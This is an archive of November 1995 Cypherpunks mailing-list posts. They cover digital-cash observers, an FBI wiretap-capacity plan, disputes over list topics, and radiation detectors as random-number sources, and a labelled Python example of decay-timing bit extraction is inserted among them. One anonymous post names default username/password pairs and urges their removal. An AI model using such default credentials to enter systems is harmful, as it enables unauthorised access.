>I recently found out that so-called observers could
>be placed on smart cards (in order to prevent double spending, or even to
>prevent people from cheating on taxes...).
>
>To be honest that's about all I know about observers and I am very eager
>to find out more. I am, however, having a hard time finding interesting
>references on this subject.
>
>Hence, all suggestions to get me started would be extremely welcome.
>Questions of particular interest are: possible functions (and limits),
>how 'real' are they already?, what about privacy?, ...
>
>Many thanks in advance.

Leo,

The concept 'Wallet (Databases) with Observers' was introduced by
David Chaum and Torben Pryds Pedersen at Crypto '92. See the
proceedings of that conference.

Put shortly, it is a method of preventing double spending of digital
cash, stored on a smart card, and still provide full payer anonymity.

Since then, others have worked on improving the original protocol,
e.g. Ronald Cramer, Niels Ferguson and Stefan Brands.
In particular the system by Stefan Brands has drawn much attention
since it was said to offer "provable security". It is his protocol
that is used in the European project CAFE.

In CAFE, each user is thought to have a PDA (Personal Digital
Assistant) which stores the digital cash. The observer is a smart
card that has to be inserted into the PDA in order to spend that cash.

I don't know how far this project has come, implementation wise
but I think another project, called SWAP was about to test
these electronic wallets in practise.

Regards,

/Lars Johansson
ljo at ausys.se

From jya at pipeline.com Fri Nov 3 07:29:56 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 23:29:56 +0800
Subject: Kallstrom Calls All Calls Tappable
Message-ID: <199511031441.JAA18237@pipe2.nyc.pipeline.com>

11-3-95.
Wash Post:

"Privacy Groups Assail FBI's Wiretapping Plan" [Excerpt]

James Kallstrom, assistant FBI director in charge of the
New York field division, argues that the proposal would in
fact reduce the FBI's surveillance authority.

"Today ... we could tap all the phones in the United
States," he said, referring to older, pre-digital
technology. Under the plan, the FBI's surveillance ability
would shrink to a maximum of 1 percent of simultaneous
telephone calls from any one telephone switch, he said.

Kallstrom said a typical central switching office in New
York that serves 50,000 telephone lines has a capacity to
carry only 5,000 calls simultaneously. It is the latter
number, not the former, he said, on which the FBI bases its
calculations. So the highest level of simultaneous
surveillance in that area, he said, would be 50 lines.

"We've never done that many" taps at one time, he said. But
in a "worst-case scenario," such as a major act of
terrorism, the agency might need such ability, he said. "I
think it's a reasonable, minimal, conservative number."

From sunder at amanda.dorsai.org Fri Nov 3 07:31:56 1995
From: sunder at amanda.dorsai.org (Ray Arachelian)
Date: Fri, 3 Nov 1995 23:31:56 +0800
Subject: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To:
Message-ID:

On Wed, 1 Nov 1995, Norman Hardy wrote:

> Stanford University Book Store (om compus) has a bunch at about $49.

I just picked up a copy from Computer Book Works in NYC (On Warren Street
between Church & Broadway near City Hall.) They only had the softcover
version there.

Now does anyone want my old 1st edition? :-)

==========================================================================
 + ^ + |  Ray Arachelian    | Amerika: The land of the Freeh. | _ |>
  \|/  |sunder at dorsai.org| Where day by day, yet another   |  \ |
<--+-->|                    | Constitutional right vanishes.  |  \|
  /|\  |    Just Say        |                                 | <|\
 + v + | "No" to the NSA!   | Jail the censor, not the author!| <| n
===================http://www.dorsai.org/~sunder/=========================

From perry at piermont.com Fri Nov 3 07:32:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 23:32:32 +0800
Subject: Radiation Detectors from Aware Electronics
In-Reply-To: <199511031009.FAA11845@opine.cs.umass.edu>
Message-ID: <199511031440.JAA08790@jekyll.piermont.com>

Futplex writes:
> Perry recently recommended the use of background-radiation detectors as
> good cheap true RNGs. Properly deployed cryptography generally depends upon
> excellent PRNGs, or preferably hardware RNGs.

Just one comment -- I think one is better off with a tiny cheap
radiation source when using such a system than in depending on
background, but the point is the same...

Perry

From perry at piermont.com Fri Nov 3 07:32:35 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 23:32:35 +0800
Subject: censored with Perry
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <199511031439.JAA08779@jekyll.piermont.com>

Gary Jeffers writes:
> Enzo Michelangeli writes:
>
> >In any case, before Perry (rightly) send us stern reminders of the scarce
> >crypto relevance of this thread, let's take it out of Cypherpunks and,
> >if someone is interested, let's continue by e-mail.
>
> Perry is again narrowly defining allowable speech on Cypherpunks.
> Encryption becomes a trivial topic if its best medium is taken by the
> States. Perry is still in his "only encryption algorithms in C is a
> proper topic for Cypherpunks" mode.

No, I don't think that, Mr. Jeffers, but I must admit that my opinion
is that random political crap (NOT careful announcements by the likes
of jya at pipeline.com of reprints of articles on the new FBI wiretap
garbage) doesn't belong.

> This is a direction that if followed
> would take the vitality and relevance out of the Cypherpunks list.
> Perry
> does a disservice for Cypherpunks.

I'm sorry, but you do a disservice to the cause of freedom. People are
trying to get work done to actually get cryptographic systems written,
deployed, and popularized, and the sort of crap that fills this place
periodically prevents people from working together towards that end.

If you want to talk about politics, go to Libernet or some such. Tim
May will doubtless disagree, but he has nothing else to do in life
than read the net so his incentives to see traffic minimized aren't
the same as other people's.

> Since when did Cypherpunks become the mailing list fit for Perry?

Look, it's simple. If you want the FBI and NSA to win, post lots of
crap here. Nothing will help them out more than clogging one of the
few communications channels available to people interested in
spreading cryptography. If you are really successful, all the smart
people will leave (as has happened in waves before -- the losses of
Steve Bellovin and (effectively) Phil Karn are still felt) and you
will have totally destroyed the channel.

> we must also take the time and trouble to occasionally tell Perry to
> shove his opinions up his ass.

If you want the anti-crypto people to win, nothing can help nearly so
much as your attitude. I'm glad to see what side you are on.

Perry

From perry at piermont.com Fri Nov 3 07:32:45 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 23:32:45 +0800
Subject: Kallstrom Calls All Calls Tappable
In-Reply-To: <199511031441.JAA18237@pipe2.nyc.pipeline.com>
Message-ID: <199511031451.JAA08816@jekyll.piermont.com>

John Young writes:
> "Privacy Groups Assail FBI's Wiretapping Plan" [Excerpt]
>
> James Kallstrom, assistant FBI director in charge of the
> New York field division, argues that the proposal would in
> fact reduce the FBI's surveillance authority.
Kallstrom is the guy who was using the example of snuff films (a known
urban legend) to try to FUD the audience at the Bar Association debate
into supporting key escrow.

It appears, by the way, that the FBI may have goofed here. Even Steve
Post, the morning classical radio announcer on WNYC-FM in New York,
was making fun of the FBI this morning.

[Let's try not to make this into an extensive thread. We all have work
to do. For example, I have a 4.4BSD IPSEC implementation in my
possession that I don't have time to integrate into NetBSD and FreeBSD
in the next few weeks. Any volunteers out there?]

Perry

From sharborth at hai-net.com Fri Nov 3 07:55:13 1995
From: sharborth at hai-net.com (sharborth at hai-net.com)
Date: Fri, 3 Nov 1995 23:55:13 +0800
Subject: Radiation Detectors from Aware Electronics
Message-ID: <9510038154.AA815422683@houston_cc_smtp.hai-net.com>

Perry -

Sorry for the rude question. I have been following this thread closely
but must have missed the original message regarding using radiation
detectors to produce random numbers.

Skip

______________________________ Reply Separator _________________________________
Subject: Re: Radiation Detectors from Aware Electronics
Author: perry at piermont.com at internet
Date: 03-11-95 09:23

sharborth at hai-net.com writes:
> So what does this have to do with this mailing list??

Generating good random numbers is key to operating a solid
cryptographic system. I've argued that computer interfaced radiation
detectors are the optimal way of generating such numbers because they
are hard to screw up -- biased diode noise and other sources are too
easy to misdesign or misuse. Aware is a source of such detectors.

Perry

> There have been several requests for information on the company that
> makes the radiation detectors with RS232 interfaces that I mentioned.
>
> Here is how to reach them:
>
> Aware Electronics
> P.O.
> Box 4299
> Wilmington, DE 19807
> Phone (800) 729-5397
>       (302) 655-3800
>
>
> Perry
>
>

From bdolan at use.usit.net Fri Nov 3 08:30:23 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Sat, 4 Nov 1995 00:30:23 +0800
Subject: Sources of randomness
In-Reply-To:
Message-ID:

On Fri, 3 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

>
>
> On Fri, 3 Nov 1995, Perry E. Metzger wrote:
>
> > I'll stick to recommending radioactive sources for now. Quantum
> > mechanics is your friend, and detectors from places like Aware are
> > cheap.
> What prices have you got listed? Is the equipment sensitive enough to get
> lots of entropy from a normal environment or do you need artificial sources
> of radioactivity? (easy, safe and cheap enough to get?)

Safe, easy-to-obtain gamma sources: orange fiesta-ware pottery (at flea
markets), old-style Coleman lantern mantles (not sure about the new ones),
uranium-ore "health pillows" (Sunshine Mine, 408-225-3670).

-bd

> Got any clues on random bits vs. time?
>
> Someone said this was discussed before, I caught the thread on the
> detector being listed but not any discussion of the product itself. Could
> anyone post an approx date so I could go look it up on the archive?
> Gracias.
> Interesting stuff.
>

From loofbour at cis.ohio-state.edu Fri Nov 3 08:50:07 1995
From: loofbour at cis.ohio-state.edu (Nathan Loofbourrow)
Date: Sat, 4 Nov 1995 00:50:07 +0800
Subject: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To:
Message-ID: <199511031547.KAA07609@hammond.cis.ohio-state.edu>

Ray Arachelian writes:
> Now does anyone want my old 1st edition? :-)

I intend to donate mine to a local library. I'd like to think that
some bright high schooler, or junior high schooler even, might get the
crypto bug a little earlier than I did. I'll try to persuade them to
leave a copy of the errata stapled to the inside back cover.

Heck, if you have the cash flow*, donate a 2nd edition instead.

nathan

* or the need for a $60 tax shelter.
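
[Added example, not part of any message in this archive. The "Radiation Detectors from Aware Electronics" and "Sources of randomness" messages above recommend decay timing as an entropy source and ask about "random bits vs. time" without showing how pulses become bits. One common approach, compared here with a fixed-threshold rule that is easy to get wrong, runs on simulated pulse times; the count rates, timer resolution and every function name are assumptions made for this example.]

```python
import math
import random

TICK_S = 1e-4  # assumed timer resolution of the serial-port reader (100 us)


def simulate_pulse_times(rate_cps, n_events, seed=1995):
    """Constructed sample input: detector pulse times in integer timer ticks.

    Decay events form a Poisson process, so the gaps between pulses are
    exponentially distributed with mean 1/rate_cps seconds.
    """
    rng = random.Random(seed)  # builds test data only; NOT an entropy source
    t, ticks = 0.0, []
    for _ in range(n_events):
        t += rng.expovariate(rate_cps)
        ticks.append(int(t / TICK_S))
    return ticks


def gaps_of(ticks):
    """Intervals between successive pulses, in ticks."""
    return [b - a for a, b in zip(ticks, ticks[1:])]


def bits_from_pulses(ticks):
    """Compare consecutive, non-overlapping gaps: first shorter -> 0, longer -> 1.

    The two gaps are independent and identically distributed, so both
    outcomes are equally likely whatever the count rate is. Equal gaps
    (an effect of timer quantisation) are discarded rather than guessed.
    """
    gaps = gaps_of(ticks)
    bits = []
    for g1, g2 in zip(gaps[0::2], gaps[1::2]):
        if g1 != g2:
            bits.append(0 if g1 < g2 else 1)
    return bits


def threshold_bits(ticks, calibrated_rate_cps):
    """Fragile alternative: 1 if a gap reaches the median gap of an assumed rate.

    Fair only while the real count rate equals calibrated_rate_cps.
    """
    threshold = round(math.log(2) / calibrated_rate_cps / TICK_S)
    return [1 if g >= threshold else 0 for g in gaps_of(ticks)]


def monobit_z(bits):
    """Z-score of the ones count against a fair coin; |z| < 3 is unremarkable."""
    n = len(bits)
    return (2 * sum(bits) - n) / math.sqrt(n)


def report(rate_cps, n_events=20001, calibrated_rate_cps=50.0):
    """Run both extractors on one simulated capture and summarise the result."""
    ticks = simulate_pulse_times(rate_cps, n_events)
    good = bits_from_pulses(ticks)
    fragile = threshold_bits(ticks, calibrated_rate_cps)
    duration_s = (ticks[-1] - ticks[0]) * TICK_S
    return {
        "bits": len(good),
        "bits_per_s": len(good) / duration_s,
        "z_pairwise": monobit_z(good),
        "z_threshold": monobit_z(fragile),
    }


if __name__ == "__main__":
    # 50 counts/s stands in for a small source near the tube,
    # 5 counts/s for a much weaker one; both values are assumed.
    for rate in (50.0, 5.0):
        print(rate, report(rate))
```

[The pairwise rule yields about one bit per two pulses (roughly 25 bits/s at 50 counts/s, 2.5 bits/s at 5 counts/s) and stays balanced at both rates, while the threshold rule calibrated for 50 counts/s becomes heavily biased at 5 counts/s.]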
From rthomas at pamd.cig.mot.com Fri Nov 3 09:15:30 1995
From: rthomas at pamd.cig.mot.com (Robert Owen Thomas)
Date: Sat, 4 Nov 1995 01:15:30 +0800
Subject: What!!!
In-Reply-To: <9511021825.S84530450@vabeach.email.net>
Message-ID: <9511031023.ZM14801@pamd.cig.mot.com>

tony266 said...
] Can someone tell me this cypherpunks is all about???

the great Dr Fred Cohen debate. oh, and an occasional comment upon
encryption and security... ;-)

regards,
--robert
--
o robert owen thomas: unix consultant. cymro ydw i. user scratching post. o
o e-mail: Robert.Thomas at pamd.cig.mot.com --or-- robt at Cymru.COM o
o vox: 708.435.7076 fax: 708.435.7360 o
o "When I die, I want to go sleeping like my grandfather... o
o Not screaming like the passengers in his car." o

From hallam at w3.org Fri Nov 3 09:18:18 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 4 Nov 1995 01:18:18 +0800
Subject: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <199511030524.VAA03406@ix5.ix.netcom.com>
Message-ID: <9511031621.AA11770@zorch.w3.org>

>>Hold on. This is more "factoid" than "fact": recall that income is PAID
>>by people as well as EARNED by people. Most payers have easily
>>detectible physical presence and assets that can easily be attached by
>>regulators. It will be a cold day before, e.g., my employer agrees not
>>to report my earnings. And the same is true for most employers in most
>>industries.

>Unfortunately, this is true, at least for people whose employers are
>subject to income tax somewhere. Taxing businesses doesn't make sense
>economically - you could collect almost as much money with far less disruption
>to the underlying economy by taxing it as wages for workers and

Why unfortunately? I happen to consider that our modern social economy is
a high point of civilisation. It is certainly a tremendous achievement. We
can educate the entire population, provide them with health care, prevent
famine and provide protection against crime and aggression by other states.
All in all rather a good deal.

While one might wish to personally avoid paying taxes there are no
benefits if everyone avoids paying taxes. There are significant areas of
the economy which can only be funded through social mandates, roads for
example.

While there are fringe political elements who put forward alternative
models I find them no more convincing than the claims of the Marxists who
made similarly ideologically based assertions not so long ago. There have
at least been examples of Marxist states, even though they were not
particularly successful and rapidly degenerated into dictatorships.

I find the libertopian obsession with government oppression and complete
indifference towards corporate exploitation unsatisfactory. The truth is
that both are inevitably interlinked. For the "libertarian" it is
unsatisfactory for the government to exploit consumers of utilities but
entirely satisfactory for corporations to do so should they have the
chance. The theoretical possibility of competition making this acceptable
even where there is no actual competition and hence no choice. This
corporativist model accepts suppression of freedom provided it is to
commercial goals.

Consider the linkage between direct mail advertising and surveillance. It
is uneconomic for a government to trace the movements of every citizen.
The communist countries were brought down as much by the cost of the huge
surveillance administrations they constructed as anything else. In the
West we do not have government surveillance, we have direct mail marketers
do the job for government. Surveillance is made economic by getting the
citizen to subsidise it.

It is naturally open for the government to apply information collected by
these people for their own purposes. It is a salable commodity and the
government is a willing buyer. Furthermore there is a sophisticated
infrastructure in place to achieve these ends.

The extent of corporate surveillance goes unnoticed by most citizens.
Few people realise that when they use their credit card in a supermarket
they are supplying a direct mail marketing company with a profile of their
spending patterns. They are also providing a statement of where they are,
and indirectly their income, residence etc.

What is needed is stringent data protection laws which enforce the
confidentiality of personal information. Note that both the SEPP and STT
payments systems conceal the credit card number from the merchant.
Cryptographic locks on individual parts of the picture are insufficient
however. What is needed is laws which make the financing of the underlying
architecture uneconomic.

Phill

From aleph1 at dfw.net Fri Nov 3 12:02:55 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sat, 4 Nov 1995 04:02:55 +0800
Subject: ecash remailer
In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu>
Message-ID:

Ahh yes, but Ed would not spend those coins, he would use them to launder
other people's coins such that any person laundering coins through Ed may
randomly get a coin, even Alice and Charlie! What's the bank to do when
they see the coins being spent by a few hundred different people.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

On Tue, 31 Oct 1995, Futplex wrote:

> Jumping in hastily:
>
> It seems to me that Ed faces a larger problem if the above scenario turns
> out to be a viable attack. Consider the following sequence: Alice and
> Charlie decide to get some (payee-anonymous) currency laundromat in hot
> water. Alice (payer-anonymously) washes some coins at the laundromat.
> Con-man Charlie claims he didn't get paid for some fictional transaction with
> Alice. Alice complains to the bank, and the rest proceeds as before. The
> Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
> situation from the bank's perspective.
>
> -Futplex
>

From nobody at REPLAY.COM Fri Nov 3 12:04:01 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 4 Nov 1995 04:04:01 +0800
Subject: IBM's Microkernal
Message-ID: <199511010122.CAA29490@utopia.hacktic.nl>

The Wall Street Journal, October 31, 1995, p. B6.

IBM Announces New Software Code That Is Universal

By Laurie Hays

International Business Machines Corp., in its effort to reduce
the importance of computer-operating systems, announced a new
kind of universal-software code called Microkernal that
enables software to work on incompatible hardware.

For software developers and businesses that want to develop
one set of codes to run applications on many different
machines, Microkernal offers an opportunity for the
long-touted open computing. A big challenge remains, however:
to market the technology and make a business case for software
developers to write for Microkernal in a world that is
dominated by Intel Corp. and Microsoft Corp.

"It's exciting technology, but it will be hard for them to
market," says Dan Kuznetsky, an analyst with International
Data Corp., a Framingham, Mass., market-research firm. "It's
also got a long way to go from what they've announced to the
future."

Mr. Kuznetsky likens the technology to the development of a
great automobile transmission that has yet to be turned into
a truck or a car.

The key to Microkernal is a single source code base that
communicates between the hardware and the operating system.
One long-term possibility, for example, would be to make the
Apple Computer Inc.'s Macintosh operating system work on an
Intel PC, impossible today because the two have different
design architectures that don't talk to each other.

IBM's delayed OS/2 operating system for the PowerPC chip,
which is expected to be shipped by the end of the year, will
be the first IBM offering for the Microkernal allowing
developers to move applications to the chip with only small
changes.
IBM so far has garnered a number of licensing agreements for
Microkernal, including Digital Equipment Corp., Maynard,
Mass., and LG Electronics, formerly the Korean electronics
concern Goldstar, as well as a number of universities.

-----

From perry at piermont.com Fri Nov 3 12:35:49 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 04:35:49 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To:
Message-ID: <199511031947.OAA00318@jekyll.piermont.com>

Timothy C. May writes:
> Implying that the reason Bellovin and Karn left the list--if they did, as I
> haven't checked--was because of "off-topic" posts seems to be a stretch.

They both left because the noise level was too high and the
cryptography content too low. I'll ask Steve to comment if you insist.

> Certainly using the departure of J. Random Subscriber, or even R. Noted
> Hacker, as "proof" that topics are inappropriate is flawed logic. "We've
> lost fine subscribers like Phil Zimmermann because of crap posted here." I
> suspect there's some fancy Latin name for this kind of appeal to authority.

The point of this list is to provide the community of people who are
interested in cryptography and its application to further personal
freedom to congregate and exchange information. If important members
of that community -- people with important input to give -- cease to
be here because of the noise level, then we most certainly are not
meeting our goal. It's not a question of appeal to authority, except
that we want this list to appeal (in the other sense) to authorities
in this field.

> Lots of other people have joined the list, and the subscription base has
> gone from an earlier plateau of about 700 subscribers to more than 1200
> recently.

I don't care about quantity. Steve Bellovin is worth 500 subscribers
-- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
lot of this stuff than most of what passes for careful thought from
the average person here.

> Political aspects of strong cryptography have always been important to this
> list. Though new subscribers may be forgiven for thinking this is the
> "Netscape bug list," such has not always been the case. Key escrow was a
> dominant topic in the early days, as it is today.

Key Escrow is a fine topic of conversation. My problem is when someone
posts a long and totally irrelevant article about the value of
internet stocks to the list, as just happened.

Perry

From perry at piermont.com Fri Nov 3 12:47:54 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 04:47:54 +0800
Subject: Webernet Madne$$
In-Reply-To: <199511031826.TAA29048@utopia.hacktic.nl>
Message-ID: <199511031940.OAA00303@jekyll.piermont.com>

This is an example of what I've been talking about. This really isn't
a cypherpunks topic. I spent lots of time reading that article trying
to find references to cryptography, security, payment systems, or
anything else, and it contained none of them. Why post this here and
waste our time?

.pm

Anonymous writes:
> Wall Street Journal, November 3, 1995
>
>
> Wall Street is in the throes of Internet mania. Or is it
> Internet madness?

From tcmay at got.net Fri Nov 3 12:49:03 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 04:49:03 +0800
Subject: Many Topics are Appropriate for Discussion Here
Message-ID:

At 2:38 PM 11/3/95, Perry E. Metzger wrote:

>Look, it's simple. If you want the FBI and NSA to win, post lots of
>crap here. Nothing will help them out more than clogging one of the
>few communications channels available to people interested in
>spreading cryptography. If you are really successful, all the smart
>people will leave (as has happened in waves before -- the losses of
>Steve Bellovin and (effectively) Phil Karn are still felt) and you
>will have totally destroyed the channel.

There have been many posts which are more "clogging" than some minor
conspiracy rants.
And if people don't want to respond to these rants, they'll decline. Far more serious, in my opinion of course, are the cross-posts to multiple mailing lists and the various press releases and position papers bombarding us. Implying that the reason Bellovin and Karn left the list--if they did, as I haven't checked--was because of "off-topic" posts seems to be a stretch. Even if Perry has gotten assurances from them personally that the "off-topic" posts were a major factor, I'm not sure much can be concluded from this. People leave for all sorts of reasons. I don't know what reasons, if any, were responsible for the unsubscribings (or at least nonpostings) of Bellovin or Karn, but I'm not too sure it matters. I don't think it is useful to speculate on the causes for specific people leaving the list, or even to ask them why they left. If they feel it is important for us to know that they left the list because of too much talk about UFOs, or about IETF committees, or about Netscape breakages, they can tell us in their departing message. Certainly using the departure of J. Random Subscriber, or even R. Noted Hacker, as "proof" that topics are inappropriate is flawed logic. "We've lost fine subscribers like Phil Zimmermann because of crap posted here." I suspect there's some fancy Latin name for this kind of appeal to authority. Topics have always been in flux, which is almost certainly a good thing, else a lot of us would have left a long time ago. Certainly those interested in some topics have little if any interest in other topics. Lots of other people have joined the list, and the subscription base has done from an earlier plateau of about 700 subscribers to more than 1200 recently. And many of the current subscribers are very active in cryptography and security. I'd be tempted to mention a half dozen or so names, but anyone I left out might feel slighted. 
I do agree with Perry that longish political essays are probably not the _best_ material for this list, though thoughtful essays on the implications of digital cash, such as several folks have written about, are always useful. And there are many troubling aspects of "crypto anarchy" that need more explication, something I always feel is appropriate for this list. I am much less bothered by _custom written_ essays by current subscribers, whatever the topic, than by reposts of long articles from other lists. Thus, occasional rants from list members are preferable, to me, to longish essays from outsiders, generally speaking. Political aspects of strong cryptography have always been important to this list. Though new subscribers may be forgiven for thinking this is the "Netscape bug list," such has not always been the case. Key escrow was a dominant topic in the early days, as it is today. And there are massive numbers of issues to be discussed in the digital money area, involving banking laws, the role of intelligence agencies in desiring to monitor cash flows, the legal implications of anonymous cash, and scads of technical issues. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From pcw at access.digex.net Fri Nov 3 13:17:23 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sat, 4 Nov 1995 05:17:23 +0800 Subject: video as a source of public randomness Message-ID: At 12:08 PM 11/3/95, Perry E. Metzger wrote: >Timothy C. May writes: >> I don't plan to belabor this point. 
Radioactive decay sources are >> certainly fine, though not likely to be purchased by most people. > >Video digitization equipment connected to TV tuners turned to dead air, >your suggestion, are equally unlikely to be purchased by most >people. The geiger counters are very simple and cheap, too. > >Perry Well, it's true that video digitization equipment _used_ to be unlikely to be purchased. Now, it is often standard equipment. I recently purchased a Mac Performa for a Customer Support desk. We chose a cheaper model that came with a built-in video tuner. It came with a _remote control_ that would allow you to switch channels and adjust the volume just like a regular remote. It was very nicely integrated and ready to suck down signal from an antenna. While I haven't hacked that part of the Mac kernel, I would not be surprised if it was easy to turn the signal into a Quicktime video file ready for hashing. This was, incidentally, one of the cheaper Performas available at the time. Your mileage may vary because Apple is really flipping all over the place on features. But, now that the cold war is over, I don't expect them to be offering the Radiation Manager plug-in any time soon. -Peter From anonymous-remailer at shell.portal.com Fri Nov 3 13:26:40 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 4 Nov 1995 05:26:40 +0800 Subject: censored with Perry Message-ID: <199511031858.KAA24013@jobe.shell.portal.com> Perry writes: >> Perry is again narrowly defining allowable speech on Cypherpunks. >> Encryption becomes a trivial topic if its best medium is taken by the >> States. Perry is still in his "only encryption algorithms in C is a >> proper topic for Cypherpunks" mode. > >No, I don't think that, Mr. Jeffers, but I must admit that my opinion >is that random political crap (NOT careful announcements by the likes >of jya at pipeline.com of reprints of articles on the new FBI wiretap >garbage) doesn't belong. 
Well, Perry, my opinion is that there is far too much noise on this list as it is. I have already seen my words drowned out by bellyaching over next to nothing. As one of the many non-Americans on this list, I find US policy and politics simply _amusing_, but certainly not in the least bit relevant to nearly anything that I do. >> This is a direction that if followed >> would take the vitality and relevance out of the Cypherpunks list. Perry >> does a disservice for Cypherpunks. > >I'm sorry, but you do a disservice to the cause of freedom. People are >trying to get work done to actually get cryptographic systems written, >deployed, and popularized, and the sort of crap that fills this place >periodically prevents people from working together towards that >end. If you want to talk about politics, go to Libernet or some such. Perry, you put an interesting twist on what the agenda of most people on this list is. It is not "getting cryptographic systems written, deployed, and popularized." It's about getting people to learn how to protect their privacy and to see that their self-interest is served by having privacy. That's much more than "writing code". If you have an insecure machine, a machine on which I can monitor your keystrokes as you enter your pass phrase, what good is strong crypto?? Somewhere between diddly and squat? >> Since when did Cypherpunks become the mailing list fit for Perry? > >Look, its simple. If you want the FBI and NSA to win, post lots of >crap here. Nothing will help them out more than clogging one of the >few communications channels available to people interested in >spreading cryptography. If you are really successful, all the smart >people will leave (as has happened in waves before -- the losses of >Steve Bellovin and (effectively) Phil Karn are still felt) and you >will have totally destroyed the channel. What would Perry have us do?? What does he want?? 
Does he want all of us to order radiation detectors to beef up our random number generators?? Talk about a red herring!! How about this instead Perry? How about if you suggest that everyone make sure that every Network which a machine connects to, and every other trusted Network has removed the username/password combinations, "tech/support", "LAN/admin", and "guest/user". This is easy to do, and is a solid recommendation. Unless the almighty "Perry" would rather that you NOT worry about simple security matters which protect privacy and are within anyone's control. >> we must also take the time and trouble to occasionally tell Perry to >> shove his opinions up his ass. > >If you want the anti-crypto people to win, nothing can help nearly so >much as your attitude. I'm glad to see what side you are on. There's lots of things I could think of doing to Perry's ass, and shoving his opinions is but one of them. It was hard enough for me as a Canadian to watch 3 out of 5 Francophones vote to separate from Canada and form their own nation. And to then watch as two leaders from within English Canada -- Preston Manning who runs the Reform Party, and Ralph Klein, who is Premier of Alberta -- breach protocol and insult the peoples of Quebec by discussing, commenting and gloating over the overall election results even before concession speeches by Bouchard and Parizeau. And I groaned later when Parizeau said that the overall vote squeaker was a result of "money and the ethnic vote." Touche. But this is nothing in comparison to listening to some jackass talk out of both sides of his mouth, while he deliberately attempts to steer people away from what the MAJORITY of posters to this list have a strong common conviction about. Securing their systems and their personal privacy. It might be a rag tag bunch with differing political ideologies, but one idea brings all of us together here. Except for one ... jackass. And yep, I'm back after a brief silence. Alice de 'nonymous ... 
...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From sjb at universe.digex.net Fri Nov 3 13:43:58 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Sat, 4 Nov 1995 05:43:58 +0800 Subject: FBI seeks huge wiretapping system In-Reply-To: <9511021709.AA03831@zorch.w3.org> Message-ID: <199511031743.MAA09044@universe.digex.net> hallam at w3.org writes: >It is a fair point that just because technology has changed the >nature of the game it should not mean that wiretaps cease to be >possible. No it isn't. If someone builds a "cone of silence", traditional audio surveillance becomes impossible. Why should wiretaps be any different? Strong crypto is the "cone of silence" for digital transmission. From m5 at dev.tivoli.com Fri Nov 3 14:27:04 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Sat, 4 Nov 1995 06:27:04 +0800 Subject: Telephone switch capacity In-Reply-To: Message-ID: <9511032051.AA14124@alpha> Noah Brodbeck writes: > Please be aware that the current capacity of the > telephone system in the United States (and for that matter, > most of the developed world) is only capable of supporting > between 15 and 20 percent simultaneous telephone > conversations. If the FBI wishes to set up a system that is > capable of monitoring 1% of the total number of lines, that > equates to a ability to tap 5%, not 1% of all calls in progress. > According to an article that was out on the AP newswire (check under ), the "1%" figure applies to actual capacity. In other words, if there's a switch with 50K subscribers but actual capacity for 5K simultaneous calls, the FBI wants to be able to make 50 simultaneous taps. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. 
| Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From shields at tembel.org Fri Nov 3 17:12:18 1995 From: shields at tembel.org (Michael Shields) Date: Sat, 4 Nov 1995 09:12:18 +0800 Subject: Transcript of Bernstein hearing is now available In-Reply-To: <9511020308.AA25206@toad.com> Message-ID: <47e5mc$pec@yage.tembel.org> In article <199511021951.LAA03152 at mycroft.rand.org>, Jim Gillogly wrote: > s/([^a-z])nsa([^a-z])/$1NSA$2/g; # Another one It'd be faster to use `s/\bnsa\b/NSA/g' for these constructs. -- Shields. From hallam at w3.org Fri Nov 3 17:40:02 1995 From: hallam at w3.org (hallam at w3.org) Date: Sat, 4 Nov 1995 09:40:02 +0800 Subject: Many Topics are Appropriate for Discussion Here In-Reply-To: Message-ID: <9511032235.AA13095@zorch.w3.org> Hi folks, There is a bug in mh mail that causes all mails to be rejected after there are more than 9999 in the same mailbox. I received 100 in two hours today so I suspect the subject line may well be related to my earlier post. They mostly fell on the floor. The rest are 50-50 pro/anti. Just a calibration point. The libertarians on the list do not seem to shrink from expressing their political views. Indeed the entire discussion on the NSA is a political thread pure and simple. My post related directly to the question of personal privacy rights in a democratic, plural society. I do not regard that it was off topic in any sense. I was not aware that any agreement was in effect as to the method by which goals might be achieved. I chose to pursue goals by the means most likely to succeed. In that I am a pragmatist. Government regulation often provides social 